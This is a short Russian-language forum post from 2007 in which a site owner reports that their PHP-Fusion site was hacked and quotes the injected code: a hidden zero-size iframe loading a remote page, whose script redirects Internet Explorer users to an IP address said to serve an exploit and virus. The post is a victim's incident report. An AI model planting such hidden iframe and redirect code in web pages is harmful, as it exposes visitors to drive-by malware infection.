02.11.2007, 22:44
|
|
Новичок
Регистрация: 27.10.2007
Сообщений: 12
Провел на форуме:
12350
Репутация:
2
|
|
По информации от хакера, как я получил, и...
В общем, сайт хакнул не по локали. Где то в скрипте есть дырка, какая и где я незнаю, но php-fusion.int.ru хакнут щас также как и мой сайт (ВНИМАНИЕ! НА САЙТЕ ВИРУС В IFLAME!)
В общем, вот как меня хакнули:
Создана новая панель:
Код:
echo("<iframe width='0' height='0' scrolling='no' noresize src='http://novor.info/iframe.php'>");
В этом файле:
Код:
<script>document.location.replace("http://58.65.234.105/cgi-bin/nsp15/in.cgi?p=spuser");</script>
А дальше сам эксплоит. По той ссылке IE получает эксплоит и вирус, а остальные браузеры -- просто редирект на google.com. |
|
|